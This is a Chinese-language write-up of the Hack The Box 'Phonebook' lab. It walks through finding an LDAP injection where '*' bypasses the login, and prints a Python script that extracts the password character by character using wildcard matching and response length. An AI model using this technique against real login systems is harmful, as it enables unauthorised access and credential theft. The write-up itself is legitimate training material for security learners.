HTB之Phonebook
前言
渗透小白第一次投稿,希望各位大佬多多包涵。这是一个简单的靶场渗透测试。
渗透过程
访问网址发现是一个登录界面和一段文字:
这句话应该是给我们提示登录的账号,使用Reese账号尝试万能密码绕过,失败:
但是发现页面回显message内容,怀疑存在XSS漏洞:
应该是存在XSS漏洞的,恶意代码已经插入网页,但不知道为啥没有弹窗,因为是self-XSS利用价值不大所以没有去深究。
猜想登录存在SQL注入,尝试使用“'”,“"”,”and 1=1“,”and 1=2“等去触发SQL语句的报错或绕过登录均失败。
扫描网站目录发现只存在当前目录:
查看网页源代码看有不有什么有用的东西,发现存在一个存放CSS脚本的目录,尝试访问,竟然进了后台:
尝试使用搜索功能,提示没有权限,白高兴一场,看来还是需要绕过登录限制:
想了一下,系统给出用户名的提示,应该是想让我们去爆破密码,于是用了密码字典和fuzz字典测试,发现用*可以绕过登录:
成功绕过登录进入后台,发现只有一个搜索框,发现是使用JSON格式发送的数据查询,尝试JSON注入,失败:
于是在网上搜索关于*绕过相关,发现是LDAP注入,*可以直接匹配数据,猜测flag应该是登录密码,尝试使用H*登录,成功,那么flag应该就是登录密码,于是我自己写了个脚本成功拿到flag,脚本如下:
import requests
import string
flag = ''
wl = ''
wordlist = string.ascii_lowercase + string.ascii_uppercase + '0123456789_}'
while 1:
for i in wordlist:
wl = flag+i
url = 'http://178.128.37.153:32155/login'
value = {'username':'Reese','password':wl+'*'}
response = requests.post(url,value)
if response.headers['Content-Length'] == '2586':
flag = wl
print(flag)
break
if i=='}':
break
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录